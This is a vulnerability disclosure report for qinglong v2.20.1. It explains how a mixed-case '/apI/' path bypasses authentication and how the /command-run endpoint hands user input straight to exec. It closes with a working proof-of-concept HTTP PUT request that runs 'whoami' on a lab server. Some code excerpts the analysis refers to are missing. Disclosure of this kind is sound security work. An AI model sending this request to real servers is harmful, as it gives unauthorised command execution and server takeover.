whyour/qinglong has a Remote Command Execution Vulnerability

[A7cc]

[PRODUCT]
qinglong v2.20.1

[TYPE]
Remote Command Execution Vulnerability

[DESCRIPTION]
whyour/qinglong has a Remote Command Execution Vulnerability. This vulnerability is a remote command execution vulnerability caused by the system's failure to strictly filter the api interface and the user's incoming parameters. Attackers can obtain server permissions by executing arbitrary commands through vulnerabilities, which may lead to further attacks on the intranet.

[ANALYZE]
Under the qinglong-develop/back/loaders/express.ts file, the AJWT verification of the api interface was used using regular expressions, but it was not filtered, resulting in the capitalized API can be bypassed, resulting in other interfaces not authorized：

Then at the /command-run route under the qinglong-develop/back/api/system.ts file, the system directly splices the parameters passed by the user to the promiseExec method:

The promiseExec method does not filter the incoming command parameter and directly uses promiseify(exec) for command execution:

In this process, no filtering has led to the vulnerability of command execution.

[POC]

PUT /apI/system/command-run HTTP/1.1
Host: 192.168.233.128:5700
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept-Encoding: gzip, deflate
Content-Type: application/json


{"command":"whoami"}